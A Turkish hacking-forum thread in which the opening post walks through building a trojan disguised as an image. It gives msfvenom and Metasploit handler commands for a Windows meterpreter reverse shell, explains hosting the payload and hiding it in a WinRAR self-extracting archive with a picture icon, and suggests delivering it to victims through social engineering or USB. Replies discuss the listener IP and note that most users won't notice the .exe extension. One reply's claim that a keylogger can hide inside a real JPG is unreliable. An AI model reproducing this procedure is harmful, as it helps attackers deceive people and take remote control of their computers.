İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Resim İçerisine Backdoor Yerleştirme

04-05-2019 18:17
#1
RTFM - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
04/2019
Mesajlar:
160
Teşekkür (Etti):
32
Teşekkür (Aldı):
96
Konular:
37
Ticaret:
(0) %
Bu gün JPG veya PNG içerisine zaralı yazılımı nasıl gömeriz ondan bahsedeceğim. Oluşturacağımız backdoor karışı tarafta yani kurban makinada bir resim olarak gözükecek ama karşı taraf bu resmi açtığında, bizde bir session açılacak yani kurban makineye bir erişim sağlamış olacağız. Bunu msfconsole ile yapacağız. Oluşturmuş olduğumuz zaralı yazılımı winrar yardımı ile bir jpg veya png resim içerisinde gizleyeceğiz. Olay bu şekilde çok uzatmadan nasıl yapılır ona geçiyorum. Keyifli okumalar.




Zaralı yazılımımızı "msfvenom" ile oluşturuyoruz ilk önce
Kod:
msfvenom -p windows/meterpreter/_reverse_tcp LHOST:<ip> LPORT:<port> -f <dosya_uzantısı>  > dosya_adı
şeklinde bir komutla zararlı yazılımımızı oluşturmuş olduk. -F ile dosya uzantısı belirtik.

Daha sonra oluşturmuş olduğumuz zararlıyı tabi daha öncesinde konsol ekranında
Kod:
service apache2 start
diyerek apache servisini başlatmamız gerekiyor daha sonra, bu zararlıyı /home/ dizininden /var/www/html dizinine taşımamız gerekiyor.



Şimdi sıra geldi msfconsole'a. Burada artık zararlı yazılımı handle edip yani payload'ı ayarlayıp dinlemeye başlayacağız.



Burada
Kod:
use exploit/multi/handler
geçiş yaptığımızda ise payload'ımızı yüklüyoruz.
Kod:
set payload windows/meterpreter/reverse_tcp
diyerek payload'ımızı da belirttik.
Daha sonra show options diyerek ayarlamamız gereken yerlere bakıyoruz.



Kod:
set LHOST <IP>
VE
Kod:
set LPORT <PORT>
dedikten sonra işlem tamam.
Gerekli olan IP ve PORT numaralarını verdikten sonra bir daha kontrol edelim eksik bir şey var mı diye. Her şey tamam artık çalıştırabiliriz.

Şimdi exploit Diyerek bizim bu zararlı yazılım karşı taraf için dinleme moduna geçecektir.



Karşı tarafta zararlı yazılım açıldığından burası da aktif hale gelecektir.

Şuan için burada bir işimiz kalmadı. Windows tarafına geçiyoruz ve bizim sunucu üzerindeki dosyamızı indiriyoruz.

Windows makinede taracıyı açıp üst tarafa
Kod:
192.168.1.2/Office.exe
diyerek zararlı dosyamızı direkt indiriyoruz.

Sonra internet üzerinden indirin ya da sizin bilgisayarınızda bulunun, hangi amaçla yapıyorsan bunu onunla ilgili bir fotoğraf buluyoruz.

Bu resimi daha sonra JPG ya da PNG resimi conver ederek ico haline getirmemiz lazım. Google'da bunun için online iconconvert siteleri var https://icoconvert.com bu siteden elinizdeki görselleri icon versiyonlarına convert edebilirsiniz.

Bu siteye girdikten sonra ilgili dosyayı yükleyip alt tarafa inip oradan şu ayarları yapmanız gerekiyor.


Bunları yaptıktan sonra alt tarafta CONVERT ICO adlı butona convert işlemi için tıkayıp daha sonra altında download your's icon yazısı oluşacak ona tıklayıp ilgili iconu indiriyoruz.

Şimdi elimizde bir zararlı yazılım, bir resim dosyası bir de icon dosyası mevcut arkadaşlar.
Yapmamız gereken zararlı yazılım ve orjinal JPG-PNG dosyalarımızı aşşağıdaki gibi seçip sağ tıklayarak arşive ekle diyoruz.


Burada açılan yerde aşağıdaki ayarları yapıyoruz. Burada dosya adına siz istediğinizi verebilirsiniz.



Daha sonra üst taraftan gelişmişe tıklıyoruz sağ tarafta ki SFX Seçenekleri'ne tıklıyoruz Burada, Kurulum diyoruz Bu alana Dosyaların gerçek isimlerini giriyoruz uzantılarıyla beraber. Örnek aşağıdaki gibi



Daha sonra Modlar Sekmesine giriyoruz, aşağıda bulunan Tümünü Gizle seçeneğini seçiyoruz.



Daha sonra yine üst menüden Metin ve Simge 'ye tıklıyoruz burdan en allta bulunan Dosyadan SFX simgesi yükleyi seçiyoruz açılan yerden bizim oluşturmuş olduğumuz icon dosyasını seçiyoruz ve yükle diyoruz.



Bütün hepsi tamam deyip işlemleri bitiriyoruz ve kullanmak istediğimiz resim hazır buna .exe uzantısı eklemişim yanlışlıkla siz böyle hatalar yapmayın.



Karşı tarafa artık kime gönderecekseniz, sosyal mühendslik ya da USB üzerine yazırıp kullanıcı taktığı an çalışmasını sağlabilirsiniz burası sizin hayal gücünüze kalmış arkadaşlar.
Karşı taraf bunu açtığı anda sizin msfconsole da dinleme modunda olduğu için direkt olarak session düşüyor bundan sonra artık msfconsole komutları iie istediğinizi yapabilirsiniz.
Benim yazacaklarım bu kadardı arkadaşlar, sıkılmadan buraya kadar okuyan herkese çok teşekkür ederim.
Kullanıcı İmzası
Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan

04-05-2019 18:42
#2
RTFM - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
04/2019
Mesajlar:
160
Teşekkür (Etti):
32
Teşekkür (Aldı):
96
Konular:
37
Ticaret:
(0) %
Alıntı:
Par4d0x1D´isimli üyeden Alıntı Mesajı göster
A wise man once said: Yok öyle bir dünya. Konu içeriği ile başlık fazlasıyla uyumsuz.
Peki neden böyle düşünüyorsun hatam ya da eksiğim varsa söyle de düzelteyim ?

Alıntı:
Par4d0x1D´isimli üyeden Alıntı Mesajı göster
SFX arşivi mimarisine, mantığına ve maksadına ilişkin bilgin yetersiz. Belli ki olayı yanlış yorumlamışsın, bu biçim bir eleştirimin tek sebebi bu. İlgili işlem vasıtasıyla görsel içeriğe ilişkin dosya uzantısına sahip bir imajın içerisine derlenmiş betik yerleştirmiyorsun, bu oldukça kritik bir güvenlik zafiyeti teşkil eder idi. Apayrı bir dosya tipi oluşturuyorsun, ve uzantısı da görsel içeriğe ait olmuyor. Yaratın olan dosyaya ait teknik detaylara internet üstünden erişebilirsin.
Doğru SFX mimarisi hakkında bilgim yetersiz, değerli yorumların için çok teşekkür ederim bunları dikkate alacağım.
Kullanıcı İmzası
Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
Konu Phemis tarafından (02-06-2019 14:48 Saat 14:48 ) değiştirilmiştir.
22-05-2019 13:01
#3
cofidik - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
Remote Pc
Mesajlar:
1.058
Teşekkür (Etti):
15
Teşekkür (Aldı):
54
Konular:
200
Ticaret:
(0) %
virtual machine üzerinden kullanılacak olursa windows makinenin mi yoksa virtual machinenin mi ipsi gerekli ?
22-05-2019 13:05
#4
RTFM - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
04/2019
Mesajlar:
160
Teşekkür (Etti):
32
Teşekkür (Aldı):
96
Konular:
37
Ticaret:
(0) %
Alıntı:
cofidik´isimli üyeden Alıntı Mesajı göster
virtual machine üzerinden kullanılacak olursa windows makinenin mi yoksa virtual machinenin mi ipsi gerekli ?
Merhaba.

Virtual Machine üzerinde de bu işlemleri bir fark olmadan kullanabilirsiniz. LHOST sizin, yani kali linux makinenin ip'si. Çünkü reverse shell aldığınız zaman oturumun bu ip üzerinden açılması gerekiyor farklı bir yerde açılmasını isterseniz o cihazın da ip'sini verebilirsiniz. Kısaca virtual machine ip'si vermeniz gerekiyor.
Kullanıcı İmzası
Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
22-05-2019 13:11
#5
cofidik - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
Remote Pc
Mesajlar:
1.058
Teşekkür (Etti):
15
Teşekkür (Aldı):
54
Konular:
200
Ticaret:
(0) %
Anladım aynı anda farklı yerlerde de kullanmak istemiştim fakat virtual machine ile idare edeceğiz teşekkür ederim verdiğin bilgi için.
27-05-2019 00:45
#6
MRL - ait Kullanıcı Resmi (Avatar)
MRL
Üye
Üyelik tarihi:
05/2019
Mesajlar:
3
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
mehrabalar ama tam anlayamadım EXE uzantılı nasıl resım ıcerısıne atıyoruz kafam karıstı
27-05-2019 00:49
#7
zztri - ait Kullanıcı Resmi (Avatar)
Geliştirici
Üyelik tarihi:
07/2015
Nereden:
Ankara
Mesajlar:
9.356
Teşekkür (Etti):
1766
Teşekkür (Aldı):
3961
Konular:
68
Ticaret:
(0) %
Alıntı:
MRL´isimli üyeden Alıntı Mesajı göster
mehrabalar ama tam anlayamadım EXE uzantılı nasıl resım ıcerısıne atıyoruz kafam karıstı
Atmıyoruz, başlık azıcık hatalı, orada işe sosyal mühendislik giriyor... Eninde sonunda oluşan dosya .exe oluyor gördüğün gibi. Sadece resim gibi davranıyor ve görünüyor.

İnsanların yüzde doksanı "dosya uzantılarını göster" seçeneğini kullanmadığından aradaki farkı anlamayacaklardır. Yani çoğu insan yiyecektir.

....

Konuya yorum; adım adım anlatmışsın üstad. Ellerine sağlık.
Kullanıcı İmzası
Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%
27-05-2019 01:21
#8
RTFM - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
04/2019
Mesajlar:
160
Teşekkür (Etti):
32
Teşekkür (Aldı):
96
Konular:
37
Ticaret:
(0) %
Alıntı:
zztri´isimli üyeden Alıntı Mesajı göster
Atmıyoruz, başlık azıcık hatalı, orada işe sosyal mühendislik giriyor... Eninde sonunda oluşan dosya .exe oluyor gördüğün gibi. Sadece resim gibi davranıyor ve görünüyor.

İnsanların yüzde doksanı "dosya uzantılarını göster" seçeneğini kullanmadığından aradaki farkı anlamayacaklardır. Yani çoğu insan yiyecektir.

....

Konuya yorum; adım adım anlatmışsın üstad. Ellerine sağlık.
Hocamızın da dediği gibi azıcık başlık hatalı, .exe dosyasını resim formatın da gösteriyoruz sadece. Değerli yorumunuz için çok teşekkür ederim hocam.
Kullanıcı İmzası
Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
27-05-2019 13:03
#9
BatHero - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Space
Mesajlar:
206
Teşekkür (Etti):
52
Teşekkür (Aldı):
16
Konular:
38
Ticaret:
(0) %
Keylogger direkt normal resmin içinede gömülebiliyordu sonu jpg formatıyla biterek, tabi onu yapınca server da hatalar meydana gelebiliyor.
Kullanıcı İmzası
Hedef gelecek.
27-05-2019 13:09
#10
zztri - ait Kullanıcı Resmi (Avatar)
Geliştirici
Üyelik tarihi:
07/2015
Nereden:
Ankara
Mesajlar:
9.356
Teşekkür (Etti):
1766
Teşekkür (Aldı):
3961
Konular:
68
Ticaret:
(0) %
Alıntı:
BatHero´isimli üyeden Alıntı Mesajı göster
Keylogger direkt normal resmin içinede gömülebiliyordu sonu jpg formatıyla biterek, tabi onu yapınca server da hatalar meydana gelebiliyor.
Öyle bir şey yok. Resim resimdir, executable dosya executable dosyadır. 5000 defa anlattık yahu.
Kullanıcı İmzası
Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%
MwTugi Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı